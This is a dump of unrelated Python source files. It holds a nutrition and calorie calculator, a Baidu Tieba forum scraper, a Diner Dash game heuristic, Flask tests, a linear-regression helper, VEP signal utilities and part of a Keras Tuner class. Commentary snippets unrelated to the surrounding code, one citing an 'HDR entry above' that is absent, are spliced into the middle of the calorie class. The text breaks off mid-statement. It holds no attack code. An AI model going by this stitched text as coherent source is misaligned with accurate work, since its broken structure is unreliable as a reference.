float(user['weight']) if user['weight'] is not None else 70\n self.height = int(user['height']) if user['height'] is not None else 167\n self.big_meals_per_day = int(user['big_meals_per_day']) if user['big_meals_per_day'] is not None else 2\n self.small_meals_per_day = int(user['small_meals_per_day']) if user['small_meals_per_day'] is not None else 3\n self.goal_id = int(user['goal_id']) if user['goal_id'] is not None else 2\n self.activity_id = int(user['activity_id']) if user['activity_id'] is not None else 1\n\n # valores default retirados de:\n # https://www.alimentacaosaudavel.dgs.pt/activeapp/wp-content/files_mf/1493809556Programadedistribuicaodealimentos.pdf\n self.carbs_macro = int(user['carbs_macro']) if user['carbs_macro'] is not None else 65\n self.protein_macro = int(user['protein_macro']) if user['protein_macro'] is not None else 13\n self.fats_macro = int(user['fats_macro']) if user['fats_macro'] is not None else 22\n\n # what the user is supposed to eat\n try:\n self.calories_to_eat = self.calculate_user_calories()\n except Exception as e:\n print (\"Error on calculate_user_calories \" + str(e))\n \n self.carbs_grams_to_eat = 
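
classic_weight_function in the HDR entry above is the hat weighting used in Debevec & Malik-style radiance recovery: trust mid-range pixel values, down-weight the extremes. Applied per pixel inside loops (and via np.vectorize) it is slow; a sketch of the same weighting as a single array expression, reusing the entry's own sanity checks:

import numpy as np

def hat_weight(z):
    # w(z) = z for z <= 128, else 255 - z, elementwise on arrays.
    z = np.asarray(z, dtype=np.float64)
    return np.where(z <= 128, z, 255.0 - z)

assert hat_weight(128) == 128
assert hat_weight(129) == 126
print(hat_weight(np.array([0, 64, 128, 200, 255])))  # [  0.  64. 128.  55.   0.]
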
self.calories_to_eat * self.carbs_macro / 100 / 4\n self.protein_grams_to_eat = self.calories_to_eat * self.protein_macro / 100 / 4\n self.fats_grams_to_eat = self.calories_to_eat * self.fats_macro / 100 / 9\n\n # what the user has served in the current meal\n self.calories_in_plate = 0\n self.weight_in_plate = 0\n self.carbs_in_plate = 0\n self.protein_in_plate = 0\n self.fats_in_plate = 0\n self.foods_in_plate = {}\n\n self.to_json = self._to_json()\n\n def calculate_age(self, born):\n if born is None:\n return None\n\n today = datetime.today()\n return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n \n def calculate_user_calories(self):\n \"\"\" Mifflin-St. Jeor Equation\n \n According to Nutrition Therapy and Pathophysiology, the Mifflin-St. Jeor\n equation was developed in 1990 and has been validated by more than 10\n studies. The Mifflin-St. Jeor equation is gaining popularity among the\n nutrition professionals for accurately estimating caloric needs. The\n equation is as follows:\n for females =\n 10 x (Weight in kg) + 6.25 x (Height in cm) - 5 x age - 161;\n for males =\n 10 x (Weight in kg) + 6.25 x (Height in cm) - 5 x age + 5.\n These equations are also multiplied by the same physical activity\n factors to estimate daily caloric needs. The physical activity factors\n are 1.2 for sedentary people, 1.3 for moderately active people and\n 1.4 for active people.\n \"\"\"\n\n cal = 0\n # apply mifflin-St Jeor Equation\n if self.sex == 'F':\n cal = 10 * self.weight + 6.25 * self.height - 5 * self.age - 161\n else:\n cal = 10 * self.weight + 6.25 * self.height - 5 * self.age +5\n # multiply by activity factor\n if self.activity_id == 1:\n cal *= ACTIVITY_LEVEL.SEDENTARY.value\n elif self.activity_id == 2:\n cal *= ACTIVITY_LEVEL.MODERATE.value\n else :\n cal *= ACTIVITY_LEVEL.ACTIVE.value\n # divide into small meals\n cal /= (self.big_meals_per_day*2 + self.small_meals_per_day)\n # adjust to 1 big meal (1 big meal = 2 small meals)\n cal *= 2\n # adjust to goal\n if self.goal_id == 1:\n cal *= GOAL.LOSE_WEIGHT.value\n elif self.goal_id == 3:\n cal *= GOAL.GAIN_WEIGHT.value\n\n return cal\n\n\n def update_meal(self, food, weight):\n\n try:\n self.calories_in_plate += food.calories_per_100g * weight / 100\n self.weight_in_plate += weight\n self.carbs_in_plate += food.carbs_per_100g * weight / 100\n self.protein_in_plate += food.protein_per_100g * weight / 100\n self.fats_in_plate += food.fats_per_100g * weight / 100\n except Exception as e:\n print('update_meal() 1')\n print('The Exception is: ' + str(e))\n\n try:\n if self.foods_in_plate == {}:\n self.foods_in_plate[food.food_id] = weight\n elif food.food_id not in self.foods_in_plate:\n self.foods_in_plate[food.food_id] = weight\n else:\n self.foods_in_plate[food.food_id] = self.foods_in_plate[food.food_id] + weight\n except Exception as e:\n print('update_meal() 2')\n print('The Exception is: ' + str(e))\n\n\n def get_meal(self):\n\n meal = Meal(self.id, datetime.now(), self.weight_in_plate, \\\n self.calories_in_plate, self.carbs_in_plate, self.protein_in_plate, \\\n self.fats_in_plate, self.foods_in_plate)\n \n return meal\n\n def _to_json(self):\n user_json = {\n 'id': self.id,\n 'name': self.name,\n 'email': self.email,\n 'card_id': self.card_id,\n 'birthday': self.birthday,\n 'age': self.age,\n 'sex': self.sex,\n 'weight': self.weight,\n 'height': self.height,\n 'big_meals_per_day': self.big_meals_per_day,\n 'small_meals_per_day': self.small_meals_per_day,\n 'goal_id': self.goal_id,\n 'activity_id': 
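
calculate_user_calories above chains several steps: the Mifflin-St Jeor BMR, an activity multiplier, division into meal slots (a big meal counting as two small ones), and a goal adjustment. A standalone sketch with the class's default profile so the arithmetic can be checked by hand; activity factor 1.2 and goal factor 1.0 (maintenance) are assumed for the example:

def big_meal_calories(weight_kg, height_cm, age, sex,
                      big_meals=2, small_meals=3,
                      activity=1.2, goal=1.0):
    # Mifflin-St Jeor resting calories.
    bmr = 10 * weight_kg + 6.25 * height_cm - 5 * age
    bmr += 5 if sex == 'M' else -161
    daily = bmr * activity * goal
    # One big meal is worth two small-meal slots.
    return daily / (big_meals * 2 + small_meals) * 2

# Defaults from User.__init__: 70 kg, 167 cm, 30 y, male, sedentary.
print(round(big_meal_calories(70, 167, 30, 'M'), 1))  # ~548.1 kcal per big meal
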
self.activity_id,\n 'carbs_macro': self.carbs_macro,\n 'protein_macro': self.protein_macro,\n 'fats_macro': self.fats_macro,\n 'calories_to_eat': self.calories_to_eat,\n 'carbs_grams_to_eat': self.carbs_grams_to_eat,\n 'protein_grams_to_eat': self.protein_grams_to_eat,\n 'fats_grams_to_eat': self.fats_grams_to_eat,\n 'calories_in_plate': self.calories_in_plate,\n 'weight_in_plate': self.weight_in_plate,\n 'carbs_in_plate': self.carbs_in_plate,\n 'protein_in_plate': self.protein_in_plate,\n 'fats_in_plate': self.fats_in_plate\n #'foods_in_plate': [json.loads(v)['food_name'] for k,v in self.foods_in_plate.items()]\n }\n return json.dumps(user_json, default=str)\n\n def __repr__(self):\n return self._to_json()\n \n\nclass Canteen:\n\n # CONSTRUCTORS ------------------------------------------------------------\n def __init__(self, canteen_json):\n canteen = json.loads(canteen_json)['canteens'][0]\n self.id = canteen['id']\n self.name = canteen['name']\n self.address = canteen['address']\n self.CCU_id = canteen['CCU_id']\n","sub_path":"SCI/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285156480","text":"'''\r\n抓取百度贴吧---郑州吧基本内容\r\n爬虫线路: requests - bs4\r\nPython版本: 3.6\r\nOS: window7\r\n'''\r\n\r\n\r\nimport requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_html(url):\r\n try:\r\n r=requests.get(url,timeout=30)\r\n r.raise_for_status()\r\n r.encoding='utf-8'\r\n # print (r.text)\r\n return r.text\r\n\r\n except:\r\n return '网页获取失败'\r\n\r\ndef gen_content(url):\r\n '''\r\n 分析贴吧的网页文件,整理信息,保存在列表变量中\r\n '''\r\n\r\n # 初始化一个列表来保存所有的帖子信息:\r\n contents=[]\r\n # 首先,我们把需要爬取信息的网页下载到本地\r\n html = get_html(url)\r\n # 我们来做一锅汤\r\n soup =BeautifulSoup(html,'lxml')\r\n # 按照之前的分析,我们找到所有具有‘ j_thread_list clearfix’属性的li标签。返回一个列表类型。\r\n li_tags=[]\r\n li_tags=soup.find_all('li',attrs={'class':' j_thread_list clearfix'})\r\n # 通过循环找到每个帖子里的我们需要的信息:\r\n for li in li_tags:\r\n # 初始化一个字典来存储文章信息\r\n comment={}\r\n # 这里使用一个try except 防止爬虫找不到信息从而停止运行\r\n \r\n # 开始筛选信息,并保存到字典中\r\n try:\r\n # .split()是吧空格分开为不同的列表,strip()方法用于移除字符串头尾指定的字符(默认为空格)\r\n comment['title']=li.find('a').text.strip()\r\n comment['link']='http://tieba.baidu.com'+li.find('a')['href']\r\n comment['name']=li.find('span',attrs={'class':'tb_icon_author'}).text.strip()\r\n comment['time']=li.find('span',attrs={'class':'pull-right is_show_create_time'}).text.strip()\r\n comment['replynum']=li.find('span',attrs={'class':'threadlist_rep_num center_text'}).text.strip()\r\n contents.append(comment)\r\n\r\n # print(comment['title'])\r\n # print(comment['link'])\r\n # print(comment['name'])\r\n # print(comment['time'])\r\n # print(comment['replynum'])\r\n except:\r\n print('出了点小问题')\r\n # print(contents)\r\n #print(type(contents))\r\n return contents\r\n\r\n\r\n\r\ndef outfile(list):\r\n '''\r\n 将爬取到的文件写入到本地\r\n 保存到当前目录的 TTBT.txt文件中。\r\n\r\n '''\r\n\r\n with open('tieba_spider.txt','a+',encoding='utf-8')as f:\r\n for l in list:\r\n f.write('标题: {}\\t 链接: {}\\t 发帖人: {}\\t 发帖时间: {}\\t 回复数量: {}\\n'.format(\r\n l['title'],l['link'],l['name'],l['time'],l['replynum']))\r\n print('爬虫保��完毕')\r\n\r\ndef main(base_url,pagenum):\r\n url_list=[]\r\n # 将所有需要爬去的url存入列表\r\n for i in range(0,pagenum):\r\n url_list.append(base_url+'&pn='+str(i*50))\r\n print('所有的网页已经下载到本地! 
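
get_html in the Tieba scraper above swallows every exception and returns a Chinese error string ('网页获取失败', "failed to fetch the web page") that callers would then parse as HTML. A sketch of a tighter version that narrows the except clause to requests' own exception base class and signals failure with None instead:

import requests

def get_html(url, timeout=30):
    # Returns the decoded page body, or None if the request failed.
    try:
        r = requests.get(url, timeout=timeout)
        r.raise_for_status()
        r.encoding = 'utf-8'
        return r.text
    except requests.RequestException as exc:
        print("request failed for {0}: {1}".format(url, exc))
        return None
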
开始筛选信息。。。。')\r\n\r\n #循环写入所有的数据\r\n\r\n for url in url_list:\r\n outfile(gen_content(url))\r\n print('页面{}保存完毕'.format(url))\r\n\r\n print('所有的信息都已经保存完毕!')\r\n\r\n\r\n\r\n# 设置需要爬取的基础页面\r\nbase_url='http://tieba.baidu.com/f?kw=郑州&ie=utf-8'\r\n# 设置需要爬取的页码数量\r\npagenum=3\r\n\r\n#当模块被直接运行时,以下代码块将被运行,当模块是被导入时,代码块不被运行。\r\nif __name__ == '__main__':\r\n\r\n main(base_url, pagenum)\r\n\r\n'''\r\n小明.py\r\n朋友眼中你是小明(__name__ == '小明'), \r\n你自己眼中你是你自己(__name__ == '__main__'), \r\n你编程很好, 朋友调你去帮他写程序(import 小明, 这时你在朋友眼中: __name__ == '小明'),\r\n但你晚上也会打开xx网站, 做一些自己的事情(直接运行小明.py, __name__ == '__main__')\r\n\r\n作者:铭尚hkyue\r\n链接:https://www.zhihu.com/question/49136398/answer/138164069\r\n来源:知乎\r\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\r\n\r\n'''","sub_path":"1.4tieba.py","file_name":"1.4tieba.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611460015","text":"import gym\n\n\ndef step_forward(env, action):\n if 15 <= action <= 56:\n allocate_table(env, action)\n elif action == 14:\n move_dish_collection(env, action)\n elif 8 <= action <= 13:\n pick_food(env, action)\n elif action == 7:\n submit_order(env, action)\n elif 1 <= action <= 6:\n move_table(env, action)\n\n time_flow(env, action)\n\n\ndef allocate_table(env, action):\n table_index_raw = action - 15\n group_index = table_index_raw // 6\n table_index = table_index_raw % 6\n table = env.my_tables[table_index]\n if table['status'] > 0 or len(env.my_queue) == 0:\n # table not available or no queue\n return\n\n if len(env.my_queue) < group_index + 1:\n return\n\n people = env.my_queue[group_index]\n if people['size'] > table['size']:\n # cannot fit\n return\n\n if people['size'] <= 4 and table['size'] == 6:\n env.master_score -= 100\n\n # allocate table\n # remove from list and assign to table\n env.master_score += 10\n people = env.my_queue.pop(group_index)\n table['people'] = people\n table['status'] = 1\n table['people']['tem_hap'] += 100\n table['start_read_time'] = env.steps_passed\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 5)\n\n\ndef move_dish_collection(env, action):\n new_item_hold = []\n\n found = False\n # clear dish in hand\n for item in env.item_hold:\n if 'dish' not in item:\n new_item_hold.append(item)\n else:\n found = True\n env.master_score += 10\n\n if not found:\n return\n\n env.master_score += 10\n env.item_hold = new_item_hold\n if env.flo_target == 8:\n env.flo_target = 0\n\n\ndef pick_food(env, action):\n table_num = action - 7\n\n if table_num not in env.food_counters:\n return\n\n # food ready for pick up\n if len(env.item_hold) >= 2:\n return\n\n # print(\"Action: pick_food \", table_num)\n # able to pick up\n env.master_score += 10\n table = env.my_tables[table_num - 1]\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n food_index = env.food_counters.index(table_num)\n env.food_counters[food_index] = -1\n env.item_hold.append('food_' + str(table_num))\n env.flo_target = table_num\n\n\ndef submit_order(env, action):\n new_item_hold = []\n found = False\n\n # clear dish in hand\n for item in env.item_hold:\n if 'order' not in item:\n new_item_hold.append(item)\n else:\n found = True\n env.master_score += 10\n table_index = int(item.split(\"_\")[1])\n env.food_counters_start_time.append({\n 'table_index': table_index,\n 'start_step': env.steps_passed\n })\n\n if not found:\n return\n\n # print(\"Action: submit_order\")\n 
env.master_score += 10\n env.item_hold = new_item_hold\n if env.flo_target == 7:\n env.flo_target = 0\n\n\ndef move_table(env, table_index):\n table = env.my_tables[table_index - 1]\n\n if table['status'] == 2:\n # ready for order\n if len(env.item_hold) >= 2:\n # cannot hold more order\n return\n\n table['status'] = 3\n env.flo_target = 7\n env.item_hold.append('order_' + str(table_index))\n env.master_score += 20\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people']['tem_hap'] += 100\n return\n\n if table['status'] == 3:\n # ordered\n food = 'food_' + str(table_index)\n if food not in env.item_hold:\n return\n\n table['status'] = 4\n env.item_hold.pop(env.item_hold.index(food))\n env.master_score += 30\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people']['tem_hap'] += 100\n table['start_eat_time'] = env.steps_passed\n return\n\n if table['status'] == 6:\n # 6 is waiting for bill\n # 5 is wait to clear table\n\n table['status'] = 5\n table['start_read_time'] = -1\n table['start_eat_time'] = -1\n env.master_score += 50\n if table['people']['hap'] < 700:\n env.master_score += round((700 - table['people']['hap']) / 10)\n table['people'] = None\n return\n\n if table['status'] == 5:\n # 5 is wait to clear table\n if len(env.item_hold) >= 2:\n return\n\n env.flo_target = 8\n env.item_hold.append('dish_' + str(table_index))\n table['status'] = 0\n env.master_score += 40\n return\n\n\ndef time_flow(env, action):\n # to simulate time flow in the game\n # each action should takes 1 second in real game\n\n # compute queue\n new_my_queue = []\n for people in env.my_queue:\n people['tem_hap'] -= people['hap_take']\n if people['tem_hap'] < 0:\n people['hap'] -= people['hap_take']\n people['tem_hap'] = 0\n\n if people['hap'] > 0:\n new_my_queue.append(people)\n else:\n env.table_lost += 1\n\n env.my_queue = new_my_queue\n\n # compute table\n for table in env.my_tables:\n table_index = env.my_tables.index(table) + 1\n people = table['people']\n if people is None:\n continue\n\n people['tem_hap'] -= people['hap_take']\n if people['tem_hap'] < 0:\n people['hap'] -= people['hap_take']\n people['tem_hap'] = 0\n\n if people['hap'] > 0:\n continue\n\n # people run away\n table['status'] = 0\n table['people'] = None\n env.table_lost += 1\n\n # clear item hold\n new_item_hold = []\n for item in env.item_hold:\n if str(table_index) not in item:\n new_item_hold.append(item)\n\n env.item_hold = new_item_hold\n\n # clear food counter\n for index, value in enumerate(env.food_counters):\n if value == table_index:\n env.food_counters[index] = -1\n\n # clear food_counters_start_time\n\n env.food_counters_start_time = list(\n filter(lambda x: x['table_index'] != table_index, env.food_counters_start_time))\n # env.food_counters_start_time = filter(lambda x: x['table_index'] != table_index,env.food_counters_start_time)\n\n env.master_score -= 500\n # env.master_score = env.master_score if env.master_score >= 0 else 0\n\n # compute food counter\n new_food_counters_start_time = []\n for i, food_time in enumerate(env.food_counters_start_time):\n if env.steps_passed - food_time['start_step'] < 10:\n new_food_counters_start_time.append(food_time)\n else:\n # food is ready\n if food_time['table_index'] in env.food_counters:\n break\n\n for i2, food in enumerate(env.food_counters):\n if food == -1:\n # env.food_counters[i] = table_index\n env.food_counters[i2] = food_time['table_index']\n break\n\n 
env.food_counters_start_time = new_food_counters_start_time\n\n # compute reading and eating\n for table in env.my_tables:\n if table['status'] == 1:\n assert table['start_read_time'] > -1\n if env.steps_passed - table['start_read_time'] >= 10:\n table['status'] = 2\n table['start_read_time'] = -1\n\n if table['status'] == 4:\n assert table['start_eat_time'] > -1\n if env.steps_passed - table['start_eat_time'] >= 10:\n table['status'] = 6\n table['start_eat_time'] = -1\n\n # compute new group\n if env.steps_passed > env.next_new_group_time:\n env.new_queue_group()\n\n env.steps_passed += 1\n return\n\n\ndef plan(env):\n max_reward = 0\n action = 0\n\n for a in range(57):\n env_temp = env.duplicate()\n step_forward(env_temp, a)\n reward = env_temp.master_score - env.master_score\n if reward > max_reward:\n action = a\n max_reward = reward\n\n return action\n\n\nif __name__ == '__main__':\n env = gym.make('diner_dash:DinerDash-v0').unwrapped\n state = env.reset()\n\n done = False\n reward_sum = 0\n while not done:\n action = plan(env.env)\n state, reward, done, _ = env.step(action)\n reward_sum += reward\n\n if env.env.steps_passed % 100 == 0:\n print(f\"Steps {env.env.steps_passed}, reward: {reward_sum}\")\n\n print(\"Total reward\", reward_sum)\n","sub_path":"heuristic_policy.py","file_name":"heuristic_policy.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"621131311","text":"import unittest\nimport app\nfrom pydo.pydo import Pydo\n\nUSER = \"1234qwer5678tyui\"\nHOME = \"/\" + USER + \"/\"\n\n\nclass AppTestCase(unittest.TestCase):\n\n def setUp(self):\n app.app.config['TESTING'] = True\n self.app = app.app.test_client()\n p = Pydo(USER)\n p.reset()\n p.save()\n\n def tearDown(self):\n p = Pydo(USER)\n p.reset()\n pass\n\n def test_empty_db(self):\n p = Pydo(USER)\n rv = self.app.get(HOME + \"tasks\")\n assert '[]' in rv.data\n\n def test_non_empty_db(self):\n p = Pydo(USER)\n p.create(\"test\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"tasks\")\n assert '[[{\"raw\": \"test\", \"type\": \"text\"}]]' in rv.data\n\n def test_query(self):\n p = Pydo(USER)\n p.create(\"one #project to find\")\n p.create(\"one project to @ignore\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"query?find=%23project\")\n assert '{\"data\": \"project\", \"raw\": \"#project\", \"type\": \"tag\"}' in rv.data\n # one does not simply ignore queries\n rv = self.app.get(HOME + \"query?find=%40ignore\")\n assert '{\"data\": \"ignore\", \"raw\": \"@ignore\", \"type\": \"context\"}' in rv.data\n\n def test_traits(self):\n p = Pydo(USER)\n p.create(\"three #tags to #find @work\")\n p.create(\"one #context to @ignore\")\n p.save()\n p = False\n rv = self.app.get(HOME + \"traits?find=%23\")\n assert '#tags' in rv.data\n assert '#find' in rv.data\n assert '#context' in rv.data\n rv = self.app.get(HOME + \"traits?find=%40\")\n assert '@work' in rv.data\n assert '@ignore' in rv.data\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pydo-tests.py","file_name":"pydo-tests.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115434483","text":"import numpy as np\n\n\ndef normal_eqn(X, y):\n theta = np.zeros((X.shape[1], 1))\n\n # ===================== Your Code Here =====================\n # Instructions : Complete the code to compute the closed form solution\n # to linear regression and put the result in 
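
plan() above implements one-step greedy lookahead: copy the environment, simulate every action, and keep the action with the best immediate score delta. A generic sketch of that pattern, assuming only that the state can be copied independently (env.duplicate() plays that role in this repo) and that step() mutates the copy:

import copy

def greedy_action(state, actions, step, score):
    # Try each action on a copy of state; return the best immediate gain.
    best_action, best_gain = actions[0], float('-inf')
    for action in actions:
        trial = copy.deepcopy(state)
        step(trial, action)
        gain = score(trial) - score(state)
        if gain > best_gain:
            best_action, best_gain = action, gain
    return best_action

# Toy usage: state is a dict holding a score; action 2 pays best.
step = lambda s, a: s.__setitem__('score', s['score'] + a)
print(greedy_action({'score': 0}, [0, 1, 2], step, lambda s: s['score']))  # 2

Unlike this sketch, the original initializes max_reward to 0 and so keeps action 0 unless some action strictly improves the score, which acts as a do-nothing fallback.
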
theta\n #\n\n XT = X.T\n s1 = np.dot(XT, X)\n s2 = np.linalg.pinv(s1)\n s2 = np.dot(s2, XT)\n theta = np.dot(s2, y.reshape(47,1))\n return theta\n","sub_path":"machine-learning-ex1/ex1/normalEqn.py","file_name":"normalEqn.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"275133728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 08 11:34:33 2017\n\n@author: Jesse Trinity (Coleman Lab)\n\nmath functions to work on stim and experiment data\n\"\"\"\nimport numpy as np\nimport Experiment\nfrom matplotlib import pyplot as plt\nimport pickle as pickle\n\n\n\nfile_names = list()\nstim_names = list()\nexperiments = dict()\nnames = dict()\n\n#gets min within [lower, upper) bounds\n#gets min of series if no bounds given\ndef min_from_window(data, **kwargs):\n lower = 0\n upper = len(data)\n if 'lower' in kwargs:\n lower = kwargs['lower']\n if 'upper' in kwargs:\n upper = kwargs['upper']\n\n minimum = data[lower:upper].min(axis=0)\n arg_minimum = data[lower:upper].argmin() + lower\n return arg_minimum, minimum\n\n#gets max within [lower, upper) bounds\n#gets max of series if no bounds given\ndef max_from_window(data, **kwargs):\n lower = 0\n upper = len(data)\n if 'lower' in kwargs:\n lower = kwargs['lower']\n if 'upper' in kwargs:\n upper = kwargs['upper']\n maximum = data[lower:upper].max(axis=0)\n arg_maximum = data[lower:upper].argmax() + lower\n return arg_maximum, maximum\n\n#called by VEPview when csv files are selected - opens csv and bin files\ndef open_file(filename, trigger):\n binfile = filename[0:-4] + \"_data.bin\"\n exp = Experiment.Experiment(binfile, filename, trigger)\n experiments[filename[0:-4]] = exp\n names.update(exp.stim_names)\n\ndef amplitude(data, **kwargs):\n return data.max[1] - data.min[1]\n \n#Gives combined data\ndef combine(data, **kwargs):\n return Experiment.CombinedStim(\"view\", data, **kwargs)\n\ndef save(filename, data):\n pickle.dump(data, open(filename, \"wb\"))\n\n","sub_path":"VEPdata.py","file_name":"VEPdata.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"517093000","text":"# Copyright 2019 The Keras Tuner Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"Ultraband hypertuner\"\nimport copy\nimport sys\nfrom math import ceil, log\n\nimport numpy as np\nfrom tensorflow.keras import backend as K\nfrom tqdm import tqdm\n\nfrom kerastuner import config\nfrom kerastuner.abstractions.display import info, subsection, warning, section\nfrom kerastuner.abstractions.display import display_settings\nfrom kerastuner.abstractions.io import get_weights_filename\nfrom kerastuner.abstractions.tensorflow import TENSORFLOW as tf\nfrom kerastuner.abstractions.tensorflow import TENSORFLOW_UTILS as tf_utils\nfrom kerastuner.collections import InstanceStatesCollection\nfrom kerastuner.distributions import RandomDistributions\nfrom kerastuner.engine import 
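
The normalEqn.py entry above hard-codes y.reshape(47, 1), tying the closed-form solution to one specific dataset size. The same normal equation, theta = pinv(X'X) X'y, in a shape-agnostic sketch:

import numpy as np

def normal_eqn(X, y):
    # Closed-form least squares via the pseudoinverse of X'X.
    y = np.asarray(y).reshape(-1, 1)  # column vector, any sample count
    return np.linalg.pinv(X.T @ X) @ X.T @ y

X = np.array([[1.0, 0.0], [1.0, 1.0], [1.0, 2.0]])
y = np.array([1.0, 3.0, 5.0])
print(normal_eqn(X, y).ravel())  # [1. 2.]: intercept 1, slope 2
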
Tuner\nfrom kerastuner.engine.instance import Instance\n\nfrom .ultraband_config import UltraBandConfig\n\n\nclass UltraBand(Tuner):\n def __init__(self, model_fn, objective, **kwargs):\n \"\"\" RandomSearch hypertuner\n Args:\n model_fn (function): Function that returns the Keras model to be\n hypertuned. This function is supposed to return a different model\n at every invocation via the use of distribution.* hyperparameters\n range.\n\n objective (str): Name of the metric to optimize for. The referenced\n metric must be part of the the `compile()` metrics.\n\n Attributes:\n epoch_budget (int, optional): how many epochs to hypertune for.\n Defaults to 100.\n\n max_budget (int, optional): how many epochs to spend at most on\n a given model. Defaults to 10.\n\n min_budget (int, optional): how many epochs to spend at least on\n a given model. Defaults to 3.\n\n num_executions(int, optional): number of execution for each model.\n Defaults to 1.\n\n project (str, optional): project the tuning belong to.\n Defaults to 'default'.\n\n architecture (str, optional): Name of the architecture tuned.\n Default to 'default'.\n\n user_info(dict, optional): user supplied information that will be\n recorded alongside training data. Defaults to {}.\n\n label_names (list, optional): Label names for confusion matrix.\n Defaults to None, in which case the numerical labels are used.\n\n max_model_parameters (int, optional):maximum number of parameters\n allowed for a model. Prevent OOO issue. Defaults to 2500000.\n\n checkpoint (Bool, optional): Checkpoint model. Setting it to false\n disable it. Defaults to True\n\n dry_run(bool, optional): Run the tuner without training models.\n Defaults to False.\n\n debug(bool, optional): Display debug information if true.\n Defaults to False.\n\n display_model(bool, optional):Display model summary if true.\n Defaults to False.\n\n results_dir (str, optional): Tuning results dir.\n Defaults to results/. Can specify a gs:// path.\n\n tmp_dir (str, optional): Temporary dir. Wiped at tuning start.\n Defaults to tmp/. Can specify a gs:// path.\n\n export_dir (str, optional): Export model dir. 
Defaults to export/.\n Can specify a gs:// path.\n\n FIXME:\n - Deal with early stop correctly\n - allows different halving ratio for epochs and models\n - allows differnet type of distribution\n\n \"\"\"\n\n super(UltraBand, self).__init__(model_fn, objective, \"UltraBand\",\n RandomDistributions, **kwargs)\n\n self.config = UltraBandConfig(kwargs.get('ratio',\n 3), self.state.min_epochs,\n self.state.max_epochs,\n self.state.epoch_budget)\n\n self.epoch_budget_expensed = 0\n\n settings = {\n \"Epoch Budget\": self.state.epoch_budget,\n \"Num Models Sequence\": self.config.model_sequence,\n \"Num Epochs Sequence\": self.config.epoch_sequence,\n \"Num Brackets\": self.config.num_brackets,\n \"Number of Iterations\": self.config.num_batches,\n \"Total Cost per Band\": self.config.total_epochs_per_band\n }\n\n section('UltraBand Tuning')\n subsection('Settings')\n display_settings(settings)\n\n def __load_instance(self, instance_state):\n if self.state.dry_run:\n return None\n\n # Determine the weights file (if any) to load, and rebuild the model.\n weights_file = None\n\n if instance_state.execution_states_collection:\n esc = instance_state.execution_states_collection\n execution_state = esc.get_last()\n weights_file = get_weights_filename(self.state, instance_state,\n execution_state)\n if not tf.io.gfile.exists(weights_file):\n warning(\"Could not open weights file: '%s'\" % weights_file)\n weights_file = None\n\n model = instance_state.recreate_model(weights_filename=weights_file)\n\n return Instance(instance_state.idx,\n model,\n instance_state.hyper_parameters,\n self.state,\n self.cloudservice,\n instance_state=instance_state)\n\n def __train_instance(self, instance, x, y, **fit_kwargs):\n tf_utils.clear_tf_session()\n\n # Reload the Instance\n instance = self.__load_instance(instance)\n\n # Fit the model\n if not self.state.dry_run:\n instance.fit(x, y, **fit_kwargs)\n\n def __train_bracket(self, instance_collection, num_epochs, x, y,\n **fit_kwargs):\n \"Train all the models that are in a given bracket.\"\n num_instances = len(instance_collection)\n\n info('Training %d models for %d epochs.' 
% (num_instances, num_epochs))\n for idx, instance in enumerate(instance_collection.to_list()):\n info(' Training: %d/%d' % (idx, num_instances))\n self.__train_instance(instance,\n x,\n y,\n epochs=num_epochs,\n **fit_kwargs)\n\n def __filter_early_stops(self, instance_collection, epoch_target):\n filtered_instances = []\n for instance in instance_collection:\n last_execution = instance.execution_states_collection.get_last()\n if not last_execution.metrics or not last_execution.metrics.exist(\n \"loss\"):\n info(\"Skipping instance %s - no metrics.\" % instance.idx)\n continue\n metric = last_execution.metrics.get(\"loss\")\n epoch_history_len = len(metric.history)\n if epoch_history_len < epoch_target:\n info(\"Skipping instance %s - history is only %d epochs long - \"\n \"expected %d - assuming early stop.\" %\n (instance.idx, epoch_history_len, epoch_target))\n continue\n\n filtered_instances.append(instance)\n return filtered_instances\n\n def bracket(self, instance_collection, num_to_keep, num_epochs,\n total_num_epochs, x, y, **fit_kwargs):\n output_collection = InstanceStatesCollection()\n if self.state.dry_run:\n for i in range(num_to_keep):\n output_collection.add(i, None)\n return output_collection\n\n self.__train_bracket(instance_collection, num_epochs, x, y,\n **fit_kwargs)\n instances = instance_collection.sort_by_objective()\n instances = self.__filter_early_stops(instances, total_num_epochs)\n\n if len(instances) > num_to_keep:\n instances = instances[:num_to_keep]\n info(\"Keeping %d instances out of %d\" %\n (len(instances), len(instance_collection)))\n\n output_collection = InstanceStatesCollection()\n for instance in instances:\n output_collection.add(instance.idx, instance)\n return output_collection\n\n def search(self, x, y, **kwargs):\n assert 'epochs' not in kwargs, \\\n \"Number of epochs is controlled by the tuner.\"\n remaining_batches = 